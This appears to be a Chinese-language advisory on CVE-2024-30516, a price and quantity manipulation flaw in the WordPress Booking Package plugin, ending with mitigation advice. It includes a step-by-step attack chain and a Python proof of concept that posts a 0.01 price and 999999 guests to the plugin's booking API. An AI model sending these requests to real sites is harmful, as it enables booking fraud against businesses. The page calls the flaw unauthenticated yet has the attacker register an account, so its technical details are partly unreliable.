CVE-2024-30516 WordPress Booking Package插件数量验证不当导致访问控制绕过

漏洞信息

漏洞编号

CVE-2024-30516

漏洞类型

访问控制绕过/输入验证不当

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Booking Package插件

漏洞概述

CVE-2024-30516是WordPress Booking Package插件中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于输入数量验证不当（Improper Validation of Specified Quantity in Input）和访问控制约束不足（Accessing Functionality Not Properly Constrained by ACLs）类型。漏洞存在于Booking Package插件的1.6.27及之前版本中，攻击者可利用该漏洞绕过正常的访问控制限制，访问本应受限的功能。攻击者无需认证即可利用此漏洞，通过构造特殊的请求包操纵输入数量参数，从而获取未授权的访问权限。该漏洞主要影响系统的完整性，可能导致敏感数据被篡改或业务逻辑被恶意利用。由于攻击复杂度低且无需用户交互，该漏洞在实际环境中具有较高的利用风险。

技术细节

该漏洞的根本原因在于Booking Package插件对用户输入的数量参数缺乏充分的验证和访问控制检查。攻击者可以通过发送特制的HTTP请求，在请求参数中注入超出预期范围的数量值。插件在处理这些输入时，未能正确验证请求者是否具有修改相应数据的权限，导致任何未授权用户都可以修改预订相关的价格和数量信息。具体来说，攻击者可能利用API端点直接提交修改请求，绕过前端界面的数量限制检查。由于插件未实施充分的ACL（访问控制列表）约束，攻击者可以访问和操作他人的预订数据。此类漏洞常见于多租户SaaS应用或涉及金钱交易的业务系统中，攻击成功后可能导致定价欺诈、库存操纵等安全问题。

攻击链分析

STEP 1

步骤1

攻击者注册WordPress普通用户账户，获取基本会话cookie和nonce

STEP 2

步骤2

攻击者识别Booking Package插件的API端点（通常位于/wp-json/booking-package/）

STEP 3

步骤3

构造恶意请求包，在数量和价格参数中注入超出正常范围的值

STEP 4

步骤4

发送特制HTTP POST请求到booking API端点，绕过前端验证

STEP 5

步骤5

插件未正确验证用户权限和输入数量约束，接受恶意参数值

STEP 6

步骤6

攻击者成功以极低价格或超额数量完成预订，导致经济损失或资源滥用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2024-30516 PoC - Booking Package Price Manipulation
# Target: WordPress site with Booking Package plugin < 1.6.28

target_url = "http://target-wordpress-site.com"

# Step 1: Get nonce for authenticated requests
# (Attacker needs to register as a basic subscriber)

# Step 2: Manipulate booking quantity/price via API
def exploit_price_manipulation(target_url, session_cookie, nonce):
    """
    Exploit improper quantity validation in Booking Package
    Allows unauthorized modification of booking prices
    """
    api_endpoint = f"{target_url}/wp-json/booking-package/v1/booking"
    
    # Malicious payload with manipulated quantity
    payload = {
        "course": "1",
        "guests": "999999",  # Manipulated quantity - no proper validation
        "price": "0.01",     # Manipulated price
        "currency": "USD",
        "nonce": nonce,
        "action": "editBooking"
    }
    
    headers = {
        "Content-Type": "application/json",
        "Cookie": session_cookie,
        "X-WP-Nonce": nonce
    }
    
    try:
        response = requests.post(api_endpoint, json=payload, headers=headers)
        if response.status_code == 200:
            result = response.json()
            print(f"[+] Exploit successful: {result}")
            return True
        else:
            print(f"[-] Exploit failed: {response.status_code}")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

# Usage example
# session = "wordpress_logged_in_xxx..."
# nonce = "user_nonce_value"
# exploit_price_manipulation(target_url, session, nonce)

影响范围

Booking Package < 1.6.28

防御指南

临时缓解措施

立即将Booking Package插件升级到1.6.28或更高版本。在无法立即升级的情况下，可暂时禁用插件或使用WAF规则限制API端点的访问频率和参数范围。同时限制非管理员用户的API访问权限，监控异常预订行为日志。